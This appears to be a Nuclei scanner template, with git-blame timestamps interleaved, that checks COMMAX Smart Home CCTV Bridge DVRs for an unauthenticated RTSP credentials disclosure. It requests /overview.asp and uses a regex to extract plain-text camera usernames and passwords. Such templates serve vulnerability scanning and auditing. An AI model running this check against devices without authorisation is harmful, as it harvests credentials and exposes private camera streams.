2021-09-25 06:02:31 +00:00
id : commax-credentials-disclosure
2021-09-24 23:39:05 +00:00
info :
name : COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure
author : gy741
severity : critical
2022-05-27 18:28:13 +00:00
description : The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text.
2022-04-22 10:38:41 +00:00
reference :
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
2021-09-25 06:02:31 +00:00
tags : commax,exposure,camera,iot
2021-09-24 23:39:05 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/overview.asp"
matchers :
- type : word
words :
- "DVR Lists"
- "rtsp://"
- "login_check.js"
2021-09-25 06:02:31 +00:00
- "MAX USER :"
2021-09-24 23:39:05 +00:00
condition : and
2021-09-25 06:02:31 +00:00
extractors :
- type : regex
part : body
regex :
- 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/Streaming\/Chann'
2022-05-27 18:28:13 +00:00
# Enhanced by mp on 2022/05/27